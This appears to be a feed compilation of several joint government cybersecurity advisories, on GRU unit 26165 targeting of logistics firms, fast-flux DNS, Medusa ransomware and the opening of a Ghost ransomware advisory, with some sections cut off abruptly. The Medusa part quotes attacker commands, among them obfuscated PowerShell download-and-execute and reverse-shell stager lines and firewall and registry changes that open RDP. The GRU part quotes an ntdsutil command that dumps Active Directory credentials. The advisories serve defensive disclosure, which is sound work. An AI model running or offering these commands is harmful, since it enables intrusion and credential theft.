Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik

Germany Federal Office for the Protection of the Constitution (BfV) Bundesamt für Verfassungsschutz

Czech Republic Military Intelligence (VZ) Vojenské zpravodajství

Czech Republic National Cyber and Information Security Agency (NÚKIB) Národní úřad pro kybernetickou a informační bezpečnost

Czech Republic Security Information Service (BIS) Bezpečnostní informační služba

Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego

Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego

United States Cybersecurity and Infrastructure Security Agency (CISA)

United States Department of Defense Cyber Crime Center (DC3)

United States Cyber Command (USCYBERCOM)

Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)

Canadian Centre for Cyber Security (CCCS)

Danish Defence Intelligence Service (DDIS) Forsvarets Efterretningstjeneste

Estonian Foreign Intelligence Service (EFIS) Välisluureamet

Estonian National Cyber Security Centre (NCSC-EE) Küberturvalisuse keskus

French Cybersecurity Agency (ANSSI) Agence nationale de la sécurité des systèmes d'information

Netherlands Defence Intelligence and Security Service (MIVD) Militaire Inlichtingen- en Veiligheidsdienst

Download the PDF version of this report:

Russian GRU Targeting Western Logistics Entities and Technology Companies (PDF, 1,081KB)

For a downloadable list of IOCs, visit:

AA25-141A STIX XML (XML, 117.02 KB )

AA25-141A STIX JSON (JSON, 144.29 KB )

Introduction

For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.
In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [1] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17. See Appendix A: MITRE ATT&CK tactics and techniques for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0.

Description of Targets

The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations:

Defense Industry

Transportation and Transportation Hubs (ports, airports, etc.)

Maritime

Air Traffic Management

IT Services

In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [T1199].

The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [TA0043].

The countries with targeted entities include the following, as illustrated in Figure 1:

Bulgaria

Czech Republic

France

Germany

Greece

Italy

Moldova

Netherlands

Poland

Romania

Slovakia

Ukraine

United States

Figure 1: Countries with Targeted Entities

Initial Access TTPs

To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to):

Credential guessing [T1110.001] / brute force [T1110.003]

Spearphishing for credentials [T1566]

Spearphishing delivering malware [T1566]

Outlook NTLM vulnerability (CVE-2023-23397)

Roundcube vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026)

Exploitation of Internet-facing infrastructure, including corporate VPNs [T1133], via public vulnerabilities and SQL injection [T1190]

Exploitation of WinRAR vulnerability (CVE-2023-38831)

The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [T1665]. [2]

Credential Guessing/Brute Force

Unit 26165 actors’ credential guessing [T1110.001] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.” [3] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [T1090.003]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [T1573].

Spearphishing

GRU unit 26165 actors’ spearphishing emails included links [T1566.002] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [T1586.002, T1586.003]. The emails were typically written in the target’s native language and sent to a single targeted recipient.

Some campaigns employed multi-stage redirectors [T1104] verifying IP-geolocation [T1627.001] and browser fingerprints [T1627] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [T1111] and CAPTCHA relaying capabilities [T1056]. Connecting endpoints failing the location checks were redirected to a benign URL [T1627], such as msn.com. Redirector services used include:

Webhook[.]site

FrgeIO

InfinityFree

Dynu

Mocky

Pipedream

Mockbin[.]org

The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [T1204.002] delivered via third-party services and redirectors [T1566.002], scripts in a mix of languages [T1059] (including BAT [T1059.003] and VBScript [T1059.005]) and links to hosted shortcuts [T1204.001].

CVE Usage

Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (CVE-2023-23397) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [T1187]. [4],[5] These actors also used a series of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to execute arbitrary shell commands [T1059], gain access to victim email accounts, and retrieve sensitive data from email servers [T1114].

Since at least fall 2023, the actors leveraged a WinRAR vulnerability (CVE-2023-38831) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [T1659]. The actors sent emails with malicious attachments [T1566.001] or embedded hyperlinks [T1566.002] that downloaded a malicious archive prepared using this CVE.

Post-Compromise TTPs

After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [T1589.002]. The actors also conducted reconnaissance of the cybersecurity department [T1591], individuals responsible for coordinating transport [T1591.004], and other companies cooperating with the victim entity [T1591.002].

The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [TA0008]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command:

`C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit`

Figure 2: Example Active Directory Domain Services command

Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [T1059.006] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [T1560]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [T1048].

Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [T1098.002] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [6]

After initial authentication, unit 26165 actors would change accounts' folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [T1556.006]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [T1552.006] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [T1087.002] and conduct a brute force password spray [T1110.003] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [T1070.001].

After gaining init

Fast Flux: A National Security Threat

Tue, 01 Apr 2025 19:00:21 +0000

Executive summary

Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult.

The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence.

The authoring agencies recommend all stakeholders—government and providers—collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity.

Download the PDF version of this report: Fast Flux: A National Security Threat (PDF, 841 KB).

Technical details

When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked.

Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [T1568.001].

Single and double flux

Malicious cyber actors use two common variants of fast flux to perform operations:

1. Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique.

Figure 1: Single flux technique.

Note: This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers.

2. Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique.

Figure 2: Double flux technique.

Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure. Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include:

Bulletproof hosting (BPH) services offer Internet hosting that disregards or evades law enforcement requests and abuse notices. These providers host malicious content and activities while providing anonymity for malicious cyber actors. Some BPH companies also provide fast flux services, which help malicious cyber actors maintain connectivity and improve the reliability of their malicious infrastructure. [1]

Refer to ASD’s ACSC’s “Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure for more information on BPH providers. [2]

Fast flux has been used in Hive and Nefilim ransomware attacks. [3], [4]

Gamaredon uses fast flux to limit the effectiveness of IP blocking. [5], [6], [7]

The key advantages of fast flux networks for malicious cyber actors include:

Increased resilience. As a fast flux network rapidly rotates through botnet devices, it is difficult for law enforcement or abuse notifications to process the changes quickly and disrupt their services.

Render IP blocking ineffective. The rapid turnover of IP addresses renders IP blocking irrelevant since each IP address is no longer in use by the time it is blocked. This allows criminals to maintain resilient operations.

Anonymity. Investigators face challenges in tracing malicious content back to the source through fast flux networks. This is because malicious cyber actors’ C2 botnets are constantly changing the associated IP addresses throughout the investigation.

Additional malicious uses

Fast flux is not only used for maintaining C2 communications, it also can play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities. Similarly, fast flux is used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts.

Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel (See Figure 3). A customer just needs to add a "dummy server interface," which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain "clean" and unblocked.

Figure 3: Example dark web fast flux advertisement.

The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking.

As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability.

Detection techniques

The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [CISA CPG 3.A]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics.

1. Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions.

2. Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle though tens or hundreds of IP addresses per day.

3. Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes.

4. Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information.

5. Use flow data to identify large-scale communications with numerous different IP addresses over short periods.

6. Develop fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior.

7. Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts.

8. Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity.

Mitigations

All organizations

To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics.

Note: Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content.

1. DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses

Block access to domains identified as using fast flux through non-routable DNS responses or firewall rules.

Consider sinkholing the malicious domains, redirecting traffic from those domains to a controlled server to capture and analyze the traffic, helping to identify compromised hosts within the network.

Block IP addresses known to be associated with malicious fast flux networks.

2. Reputational filtering of fast flux enabled malicious activity

Block traffic to and from domains or IP addresses with poor reputations, especially ones identified as participating in malicious fast flux activity.

3. Enhanced monitoring and logging

Increase logging and monitoring of DNS traffic and network communications to identify new or ongoing fast flux activities.

Implement automated alerting mechanisms to respond swiftly to detected fast flux patterns.

Refer to ASD’s ACSC joint publication, Best practices for event logging and threat detection, for further logging recommendations.

4. Collaborative defense and information sharing

Share detected fast flux indicators (e.g., domains, IP addresses) with trusted partners and threat intelligence communities to enhance collective defense efforts. Examples of indicator sharing initiatives include CISA’s Automated Indicator Sharing or sector-based Information Sharing and Analysis Centers (ISACs) and ASD’s Cyber Threat Intelligence Sharing Platform (CTIS) in Australia.

Participate in public and private information-sharing programs to stay informed about emerging fast flux tactics, techniques, and procedures (TTPs). Regular collaboration is particularly important because most malicious activity by these domains occurs within just a few days of their initial use; therefore, early discovery and information sharing by the cybersecurity community is crucial to minimizing such malicious activity. [8]

5. Phishing awareness and training

Implement employee awareness and training programs to help personnel identify and respond appropriately to phishing attempts.

Develop policies and procedures to manage and contain phishing incidents, particularly those facilitated by fast flux networks.

For more information on mitigating phishing, see joint Phishing Guidance: Stopping the Attack Cycle at Phase One.

Network defenders

The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment.

However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat.

For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about Selecting a Protective DNS Service. [9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s DIB Cybersecurity Services and factsheet. CISA also offers a Protective DNS service for federal civilian executive branch (FCEB) agencies. See CISA’s Protective Domain Name System Resolver page and factsheet for more information.

Conclusion

Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats.

The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization's cyber defenses.

Works cited

[1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service

[2] Australian Signals Directorate’s Australian Cyber Security Centre. "Bulletproof" hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025. https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers

[3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023. https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf

[4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021. https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them

[5] Unit 42. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022. https://unit42.paloaltonetworks.com/trident-ursa/

[6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024. stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.

Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation.

FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.

Download the PDF version of this report:

For a downloadable list of IOCs, see:
AA25-071A STIX XML (XML, 34.30 KB ) AA25-071A STIX JSON (JSON, 42.28 KB )
Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Background

The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.

Initial Access

Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:

Phishing campaigns as a primary method for stealing victim credentials [T1566].

Exploitation of unpatched software vulnerabilities [T1190] through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and Fortinet EMS SQL injection vulnerability [CVE-2023-48788 [CWE 89: SQL Injection].

Discovery

Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include:

`21` (FTP)

`22` (SSH)

`23` (Telnet)

`80` (HTTP)

`115` (SFTP)

`443` (HTTPS)

`1433` (SQL database)

`3050` (Firebird database)

`3128` (HTTP web proxy)

`3306` (MySQL database)

`3389` (RDP)

Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information.

Defense Evasion

Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (`certutil.exe`) is used to avoid detection when performing file ingress.

Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003].

In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings.

`powershell -exec bypass -enc <base64 encrypted command string>`

In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027].

`powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)`

In the final example, the payload is an obfuscated base64 string read into memory, decompressed from `gzip`, and used to create a `scriptblock`. The base64 payload is split using empty strings and concatenation, and uses a format operator (`-f`) followed by three arguments to specify character replacements in the base64 payload.

`powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((`

`New-Object System.IO.StreamReader(`

`New-Object System.IO.Compression.GzipStream((`

`New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(`

`(('<base64 payload string>')-f'<character replacement 0>','<character replacement 1>', '<character replacement 2>')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))`

The obfuscated base64 PowerShell payload is identical to `powerfun.ps1`, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port `443` [T1071.001], and initiates a connection to a remote port `443` in the reverse shell.

In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001].

FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:

Ligolo.

A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.

Cloudflared.

Formerly known as ArgoTunnel.

Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.

Lateral Movement and Execution

Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to:

Copy (`-c`) one script from various batch scripts on the current machine to the remote machine and execute it with `SYSTEM` level privileges (`-s`).

Execute an already existing local file on a remote machine with `SYSTEM` level privileges.

Execute remote shell commands using `cmd /c`.

One of the batch scripts executed by PsExec is `openrdp.bat`, which first creates a new firewall rule to allow inbound TCP traffic on port `3389`:

`netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow`

Then, a rule to allow remote WMI connections is created:

`netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes`

Finally, the registry is modified to allow Remote Desktop connections:

`reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`

Mimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement.

Exfiltration and Encryption

Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, `gaze.exe`, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a `.medusa` file extension. The process `gaze.exe` terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070].

Extortion

Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a `.onion` data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.

Indicators of Compromise

Table 1 lists the hashes of malicious files obtained during investigations.

Table 1: Malicious Files

Files Hash (MD5) Description

!!!READ_ME_MEDUSA!!!.txt Redacted Ransom note file

openrdp.bat 44370f5c977e415981febf7dbb87a85c Allows incoming RDP and remote WMI connections

pu.exe 80d852cd199ac923205b61658a9ec5bc Reverse shell

Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.

Table 2: Medusa Email Addresses

Email Addresses Description

key.medusa.serviceteam@protonmail.com Used for ransom negotiation

medusa.support@onionmail.org Used for ransom negotiation

mds.svt.breach@protonmail.com Used for ransom negotiation

mds.svt.mir2@protonmail.com Used for ransom negotiation

MedusaSupport@cock.li Used for ransom negotiation

MITRE ATT&CK Tactics and Techniques

See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Initial Access

Technique Title ID Use

Exploit Public-Facing Application T1190 Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.

Initial Access TA0001 Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access.

Phishing T1566 Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.

#StopRansomware: Ghost (Cring) Ransomware

Wed, 19 Feb 2025 16:38:21 +0000

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.

Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.

The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.

Download the PDF version of this report:

AA25-050A #StopRansomware: Ghost (Cring) Ransomware (PDF, 735.18 KB )

For a downloadable copy of IOCs, see:

AA25-050A STIX XML (XML, 78.67 KB )

AA25-050A STIX XML (Additional IOCs) (XML, 74.01 KB )

AA25-050A STIX JSON (JSON, 68.47 KB )

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16.1. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

